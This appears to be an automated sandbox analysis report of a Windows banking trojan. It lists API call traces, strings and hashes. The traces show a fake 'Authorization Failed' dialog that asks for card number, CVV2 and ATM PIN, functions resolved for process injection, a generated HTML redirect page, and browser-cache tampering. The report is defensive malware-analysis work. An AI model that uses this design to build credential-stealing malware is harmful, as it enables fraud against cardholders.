                            • DeleteFileA.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F2B
                            • TerminateProcess.KERNEL32(?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F38
                            • CloseHandle.KERNEL32(?,?,00000000,?,00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00000044,?), ref: 00405F49
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$Filelstrlensprintf$CloseDeleteHandleProcessSleepThreadWindowmemset$CopyCountCreateCurrentDesktopEnvironmentExpandFindFreeIncrementInterlockedLocalOpenPathStringsTempTerminateTextTicksrandstrncmp
                            • String ID: %s%u - Microsoft Internet Explorer$<HTML><!--$D$IEFrame$MicroSoft-Corp$Path$Software\Microsoft\IE Setup\Setup$X-okRecv11$\Iexplore.exe
                            • API String ID: 4103625910-1993706416
                            • Opcode ID: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction ID: dc295d18008c6f961fbff17ccdc6ec9b88b81df80f56d8f6893aa762a7281c5f
                            • Opcode Fuzzy Hash: b9d5d98bcea3d6b4cff9c9a0aa81b3c666a447f1829ed1e8b0ebd8478639a6cb
                            • Instruction Fuzzy Hash: 7B81A8B1E041186ADB20B665CC4ABDEB7BD9F40304F1444F7B608F61D1E6B99F848F59
                            APIs
                            • CreateFileA.KERNEL32(?,80000000,?,00000000,?,00000080,00000000), ref: 0040677F
                            • GetFileSize.KERNEL32(00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 0040679E
                            • CloseHandle.KERNEL32(00000000,00000000,00000000,?,80000000,?,00000000,?,00000080,00000000), ref: 004067A6
                              • Part of subcall function 004013CC: RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 004013EF
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?), ref: 004054F1
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?), ref: 00405505
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?), ref: 00405513
                              • Part of subcall function 004054D7: lstrlenA.KERNEL32(?,?,?,?), ref: 0040551F
                              • Part of subcall function 004054D7: LocalAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 0040554B
                              • Part of subcall function 004054D7: memcpy.CRTDLL(00000001,?,?,00000000,?,?,?,?,?), ref: 0040556A
                              • Part of subcall function 004054D7: CreateThread.KERNEL32(00000000,00000000,Function_00005133,00000000,00000000,?), ref: 004055DE
                              • Part of subcall function 004054D7: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?,-00000005,?), ref: 004055EE
                              • Part of subcall function 004054D7: GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005133,00000000,00000000,?,?,?,?,?,00000006,?), ref: 004055F8
                              • Part of subcall function 00401348: RegCreateKeyExA.ADVAPI32(?,?,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 00401375
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Create$FileThread$AllocCloseCodeExitHandleLocalObjectOpenSingleSizeWaitmemcpy
                            • String ID: Software\Microsoft
                            • API String ID: 3232930010-89712428
                            • Opcode ID: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction ID: db3b40ff5e41acc5bdae17a6e42d24a18e18c948de20eb22515eb7809feee29e
                            • Opcode Fuzzy Hash: fe47db177618890fec732a06e734d603300a7356096fbf0c01363e8c7022514f
                            • Instruction Fuzzy Hash: C3219972E002097BEB10AE998D42FDEBAA8DB04714F644077FB00B61E1E6B55A108B99

                            Control-flow Graph

                            APIs
                              • Part of subcall function 00405FFA: GetWindow.USER32(?,00000005), ref: 00406019
                              • Part of subcall function 00405FFA: GetClassNameA.USER32(00000000,?,00000FFF), ref: 0040603B
                            • ShowWindow.USER32(00000000), ref: 004060B9
                            • GetWindowRect.USER32(00000000,?), ref: 004060C9
                            • CreateWindowExA.USER32(00000200,QueenKarton,0042CBF0,50800000,00000000,00000000,?,?,00000000,00000000,00000000,00000000), ref: 004060FF
                            • CreateWindowExA.USER32(00000000,STATIC, Authorization Failed.,50800000,00000014,00000014,?,0000003C,00000000,00000000,00000000,00000200), ref: 00406135
                            • CreateWindowExA.USER32(00000000,STATIC,0042CBF0,50800009,00000014,00000051,?,0000012C,00000000,00000000,00000000,STATIC), ref: 00406179
                            • CreateFontA.GDI32(00000014,00000008,00000000,00000000,000002BC,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 004061A2
                            • SendMessageA.USER32(00000030,00000000,00000001,00000000), ref: 004061B4
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,00000014,00000014,00000064,00000064,00000000,00000000,STATIC,0042CBF0), ref: 004061E2
                            • SendMessageA.USER32(00000000,00000143,00000000,MasterCard), ref: 004061FF
                            • SendMessageA.USER32(00000143,00000000,Visa,00000000), ref: 00406216
                            • SendMessageA.USER32(0000014E,00000001,00000000,00000143), ref: 00406233
                            • SendMessageA.USER32(0000014E,00000000,00000000,00000143), ref: 00406249
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,0000007A,00000014,00000032,0000012C,00000000,00000000,0000014E,00000000), ref: 0040627A
                            • CreateWindowExA.USER32(00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX), ref: 004062B9
                            • sprintf.CRTDLL(?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C,0000012C,00000000,00000000,00000000,COMBOBOX,0042CBF0), ref: 004062DF
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 004062F5
                            • sprintf.CRTDLL(?,20%.2u,-00000002,00000143,00000000,?,?,%.2u,00000001,00000000,COMBOBOX,0042CBF0,50800003,000000AE,00000014,0000003C), ref: 0040630B
                            • SendMessageA.USER32(00000143,00000000,?,?), ref: 00406324
                            • CreateWindowExA.USER32(00000000,STATIC,Card && expiration date,50000000,00000114,0000006E,00000081,00000010,00000000,00000000,00000143,00000000), ref: 0040636B
                            • CreateWindowExA.USER32(00000000,STATIC,Your card number,50000000,000000C3,00000087,00000067,00000010,00000000,00000000,00000000,STATIC), ref: 004063AA
                            • CreateWindowExA.USER32(00000000,STATIC,3-digit validation code on back of card (cvv2),50000000,00000064,000000A0,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 004063E3
                            • CreateWindowExA.USER32(00000000,STATIC,ATM PIN-Code,50000000,000000A0,000000B9,00000056,00000010,00000000,00000000,00000000,STATIC), ref: 0040641C
                            • CreateWindowExA.USER32(00000000,STATIC,Unable to authorize. ATM PIN-Code is required to complete the transaction.,50000000,0000001E,000000E6,000001E4,00000010,00000000,00000000,00000000,STATIC), ref: 00406455
                            • CreateWindowExA.USER32(00000000,STATIC,Please make corrections and try again.,50000000,0000001E,000000FF,000000FD,00000010,00000000,00000000,00000000,STATIC), ref: 0040648E
                            • CreateWindowExA.USER32(00000200,EDIT,00429180,50800000,00000014,0000002D,00000082,00000018,00000000,00000000,00000000,STATIC), ref: 004064C7
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,00000046,00000028,00000018,00000000,00000000,00000200,EDIT), ref: 00406503
                            • CreateWindowExA.USER32(00000200,EDIT,0042CBF0,50800000,00000014,0000005F,00000064,00000018,00000000,00000000,00000200,EDIT), ref: 00406539
                            • CreateWindowExA.USER32(00000000,BUTTON,Click Once To Continue,50800000,0000001E,00000140,0000009B,00000017,00000000,00000000,00000200,EDIT), ref: 00406572
                            • CreateFontA.GDI32(00000010,00000006,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000005,00000000,00000000,00000002,00000000), ref: 0040659B
                            • SendMessageA.USER32(00000030,00000000,00000001,00000010), ref: 004065B3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065C3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065D3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065E3
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 004065F9
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406609
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406619
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406632
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406642
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406652
                            • SendMessageA.USER32(00000030,00000000,00000001,00000030), ref: 00406662
                            • GetWindowLongA.USER32(000000FC,00000030), ref: 0040666F
                            • SetWindowLongA.USER32(000000FC,004077E4,00000000), ref: 00406686
                            • GetWindowLongA.USER32(000000FC,00000001), ref: 00406699
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066B0
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066BD
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066D4
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 004066E1
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 004066F8
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406705
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 0040671C
                            • GetWindowLongA.USER32(000000FC,000000FC), ref: 00406732
                            • SetWindowLongA.USER32(000000FC,004077E4,000000FC), ref: 00406749
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: Window$CreateMessageSend$Long$Fontsprintf$ClassNameRectShow
                            • String ID: Authorization Failed.$%.2u$20%.2u$3-digit validation code on back of card (cvv2)$ATM PIN-Code$BUTTON$COMBOBOX$Card && expiration date$Click Once To Continue$DocObject$EDIT$Explorer$MasterCard$Please make corrections and try again.$QueenKarton$STATIC$Unable to authorize. ATM PIN-Code is required to complete the transaction.$Visa$Your card number
                            • API String ID: 1504929638-2953596215
                            • Opcode ID: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction ID: 07d4a47d2009414dc6278682baa0b56b1decc7bc7d2f3e077783c243e1dcc7f7
                            • Opcode Fuzzy Hash: 2b110ff0b09441361ee02be2c61f902c508efa27e53455d3dea65c4eb733ddb1
                            • Instruction Fuzzy Hash: 43F16F31BC43157AFA212B61ED43FA93A66AF14F44F60413AB700BD0F1DAF92911AB5D

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 310 40570c-405743 call 4079e4 GetTempPathA 313 405746-40574b 310->313 313->313 314 40574d-405796 call 4015ea strcat sprintf rand 313->314 317 405798-4057a9 strcat 314->317 318 4057ac-4057bc rand 314->318 317->318 319 4057e7-4057f7 rand 318->319 320 4057be-4057e4 rand sprintf 318->320 321 4057f9-40580a strcat 319->321 322 40580d-405837 strcat rand 319->322 320->319 321->322 323 405839-40584a strcat 322->323 324 40584d-40585d rand 322->324 323->324 325 405888-4058c1 sprintf rand 324->325 326 40585f-405885 rand sprintf 324->326 327 4058c3-4058d4 strcat 325->327 328 4058d7-4058fb strcat rand 325->328 326->325 327->328 329 405911-40593b strcat rand 328->329 330 4058fd-40590e strcat 328->330 331 405966-40598a strcat rand 329->331 332 40593d-405963 rand sprintf 329->332 330->329 333 4059a0-4059d0 strcat rand 331->333 334 40598c-40599d strcat 331->334 332->331 335 4059d2-4059e3 strcat 333->335 336 4059e6-405a0a strcat rand 333->336 334->333 335->336 337 405a20-405a5a sprintf rand 336->337 338 405a0c-405a1d strcat 336->338 339 405a70-405a9a strcat rand 337->339 340 405a5c-405a6d strcat 337->340 338->337 341 405ab0-405af1 rand sprintf rand 339->341 342 405a9c-405aad strcat 339->342 340->339 343 405af3-405b04 strcat 341->343 344 405b07-405b37 strcat rand 341->344 342->341 343->344 345 405b39-405b4a strcat 344->345 346 405b4d-405b5d rand 344->346 345->346 347 405b88-405c08 strcat CreateFileA lstrlenA WriteFile CloseHandle 346->347 348 405b5f-405b85 rand sprintf 346->348 348->347
                            APIs
                            • GetTempPathA.KERNEL32(00000104,?), ref: 00405730
                            • strcat.CRTDLL(?,.htm), ref: 00405764
                            • sprintf.CRTDLL(?,<html>), ref: 00405778
                            • rand.CRTDLL ref: 00405786
                            • strcat.CRTDLL(?,0042CC6C), ref: 004057A4
                            • rand.CRTDLL ref: 004057AC
                            • rand.CRTDLL ref: 004057BE
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 004057DF
                            • rand.CRTDLL ref: 004057E7
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405805
                            • strcat.CRTDLL(?,<head>), ref: 00405819
                            • rand.CRTDLL ref: 00405827
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405845
                            • rand.CRTDLL ref: 0040584D
                            • rand.CRTDLL ref: 0040585F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405880
                            • sprintf.CRTDLL(?,%s<title>%s%u</title>,?,MicroSoft-Corp,?), ref: 004058A3
                            • rand.CRTDLL ref: 004058B1
                            • strcat.CRTDLL(?,0042CC6C), ref: 004058CF
                            • strcat.CRTDLL(?,</head>), ref: 004058E3
                            • rand.CRTDLL ref: 004058EB
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405909
                            • strcat.CRTDLL(?,<body>), ref: 0040591D
                            • rand.CRTDLL ref: 0040592B
                            • rand.CRTDLL ref: 0040593D
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 0040595E
                            • strcat.CRTDLL(?,<script>), ref: 00405972
                            • rand.CRTDLL ref: 0040597A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405998
                            • strcat.CRTDLL(?,function x()), ref: 004059AC
                            • rand.CRTDLL ref: 004059C0
                            • strcat.CRTDLL(?,0042CC6C), ref: 004059DE
                            • strcat.CRTDLL(?,0042CA2E), ref: 004059F2
                            • rand.CRTDLL ref: 004059FA
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A18
                            • sprintf.CRTDLL(?,%sself.parent.location="%s";,?,?), ref: 00405A42
                            • rand.CRTDLL ref: 00405A4A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405A68
                            • strcat.CRTDLL(?,0042CA14), ref: 00405A7C
                            • rand.CRTDLL ref: 00405A8A
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AA8
                            • rand.CRTDLL ref: 00405AB0
                            • sprintf.CRTDLL(?,%ssetTimeout("x()",%u);,?), ref: 00405AD9
                            • rand.CRTDLL ref: 00405AE1
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405AFF
                            • strcat.CRTDLL(?,</script>), ref: 00405B13
                            • rand.CRTDLL ref: 00405B27
                            • strcat.CRTDLL(?,0042CC6C), ref: 00405B45
                            • rand.CRTDLL ref: 00405B4D
                            • rand.CRTDLL ref: 00405B5F
                            • sprintf.CRTDLL(?,%s<!-- %u -->,?), ref: 00405B80
                            • strcat.CRTDLL(?,</body><html>), ref: 00405B94
                            • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BAC
                            • lstrlenA.KERNEL32(?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BCD
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BE9
                            • CloseHandle.KERNEL32(?,?,?,00000000,?,00000000,?,?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00405BF4
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: strcat$rand$sprintf$File$CloseCreateHandlePathTempWritelstrlen
                            • String ID: %s<!-- %u -->$%s<title>%s%u</title>$%sself.parent.location="%s";$%ssetTimeout("x()",%u);$.htm$</body><html>$</head>$</script>$<body>$<head>$<html>$<script>$MicroSoft-Corp$function x()
                            • API String ID: 4291226702-3565490566
                            • Opcode ID: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction ID: 1c5cdfde58a584b0b9fe07ae47c92bc765a9e47636cc13cf9b12a0be20bdf5ec
                            • Opcode Fuzzy Hash: 08e8a8e08d7a39e8062486bb6ab2fd16be076c2ff6bcf67ed59b44270b333af9
                            • Instruction Fuzzy Hash: 93B1CAB6F0132416EB14A262DCC6B6D31AA9B85704F6404FFF508731C2E67C6E558AFE
                            APIs
                              • Part of subcall function 00402822: GetModuleHandleA.KERNEL32(ntdll.dll,00000000,69D467A1,00402E1B,00000000,69D467A1,?,?,00406F1E,00000000,00000000,00000000,QueenKarton_12,%s\%s,00429080,dnkkq.dll), ref: 0040283A
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlInitUnicodeString), ref: 00402847
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtUnmapViewOfSection), ref: 00402857
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtOpenSection), ref: 0040286D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 0040287D
                              • Part of subcall function 00402822: GetProcAddress.KERNEL32(00000000,RtlNtStatusToDosError), ref: 0040288D
                            • GetVersion.KERNEL32 ref: 00402E22
                            • LoadLibraryA.KERNEL32 ref: 00402E91
                            • GetProcAddress.KERNEL32 ref: 00402EC5
                            • IsBadReadPtr.KERNEL32(?,00001000), ref: 00402F75
                            • GlobalMemoryStatus.KERNEL32(?), ref: 00402F9F
                            • CloseHandle.KERNEL32(?), ref: 00403065
                            • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004030EA
                            • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040315B
                            • IsBadWritePtr.KERNEL32(00000000,00001000), ref: 004031F1
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Handle$Module$CloseGlobalLibraryLoadMemoryQueryReadStatusVersionVirtualWrite
                            • String ID: kernel32.dll
                            • API String ID: 2089743848-1793498882
                            • Opcode ID: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction ID: cfd5926590b061e949c3a24607155209ead47d6dc4f6dfca132d0ef3b1a5cdf0
                            • Opcode Fuzzy Hash: 4f42c9a603f3b22a608ddecb7cf3016b4a0286024c9d1ec82fce5a6e54f44313
                            • Instruction Fuzzy Hash: F6F19070D042B88BEB328F64DD483E9BBB1AB55306F0481EBD588662D2C2B85FC5CF55
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00405F73
                            • lstrlenA.KERNEL32(?,?), ref: 00405F7E
                            • LocalAlloc.KERNEL32(00000040,?,?,?), ref: 00405F8D
                            • lstrlenA.KERNEL32(?,00000000,?,00000040,?,?,?), ref: 00405FA2
                            • DeleteUrlCacheEntry.WININET(?), ref: 00405FB5
                            • CreateThread.KERNEL32(00000000,00000000,Function_00005C09,00000000,00000000,?), ref: 00405FCA
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040,?,?), ref: 00405FDD
                            • GetExitCodeThread.KERNEL32(00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?,00000040), ref: 00405FE7
                            • CloseHandle.KERNEL32(00000000,00000000,?,00000000,000000FF,00000000,00000000,Function_00005C09,00000000,00000000,?,00000001,?,?,00000000,?), ref: 00405FED
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Thread$AllocCacheCloseCodeCreateDeleteEntryExitHandleLocalObjectSingleWait
                            • String ID:
                            • API String ID: 794401840-0
                            • Opcode ID: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction ID: 5ee1198a60b0fc2a8532ff5616a25e8349e08cf473eab22e95dc85017e90c3ca
                            • Opcode Fuzzy Hash: 03fc3e79f5e594bfaf1f893bda151e66fa8c5b5e213fcd764589a016d7372ae4
                            • Instruction Fuzzy Hash: B011CA71A082447BD701F6668C42EAFB76DDF85368F144476F600B71C2D678AF0147E9
                            APIs
                            • FindFirstUrlCacheEntryA.WININET(*.*,?,00001F40), ref: 00405654
                            • _stricmp.CRTDLL(?,?), ref: 00405679
                            • FindNextUrlCacheEntryA.WININET(00000000,?,00001F40), ref: 004056C0
                            • _stricmp.CRTDLL(?,?), ref: 004056D6
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: CacheEntryFind_stricmp$FirstNext
                            • String ID: *.*
                            • API String ID: 747601842-438819550
                            • Opcode ID: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction ID: aa6d97de36eacb02400b0bc5d5be45fc0d4f636131057f9c0ab70f2a458f06eb
                            • Opcode Fuzzy Hash: ba5afd5151c0520d6d715a10c5df759dc41a82144f0bc2f8a3a4ef8e8a54dfaf
                            • Instruction Fuzzy Hash: AD21CF72E1005AABCB109A65CC018FBB6EEEB44398F1404F3F108F7290EB799E418F65
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: printf
                            • String ID: %02X $HEX:
                            • API String ID: 3524737521-2568639716
                            • Opcode ID: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction ID: 8eff4c8c66366255d0771bcdb7d8d21a427f9234d78b176c67630138abebef86
                            • Opcode Fuzzy Hash: 20ec43f9d3281b237926bfbb5e092365326a766f922892e0b88cafedccc6c182
                            • Instruction Fuzzy Hash: 43F0E972F05214BBD704DB9ADC4286E77A9DB9236473080FBF804631C0E9755F0086A9
                            APIs
                            • lstrlenA.KERNEL32(?), ref: 00404492
                            • LocalAlloc.KERNEL32(00000040,-00000008,?), ref: 004044A4
                            • sprintf.CRTDLL(?,%s%c%c,?,4EC4EBEE,?,00000040,-00000008,?), ref: 00404515
                            Strings
                            Memory Dump Source
                            • Source File: 00000009.00000002.1986338181.0000000000401000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 00000009.00000002.1986305322.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986378400.000000000042A000.00000004.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986418950.000000000042E000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986471644.000000000042F000.00000002.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986516126.0000000000436000.00000020.00000001.01000000.0000000C.sdmp
                            • Associated: 00000009.00000002.1986550435.0000000000438000.00000002.00000001.01000000.0000000C.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_9_2_400000_Odekfoij.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocLocallstrlensprintf
                            • String ID: %s%c%c
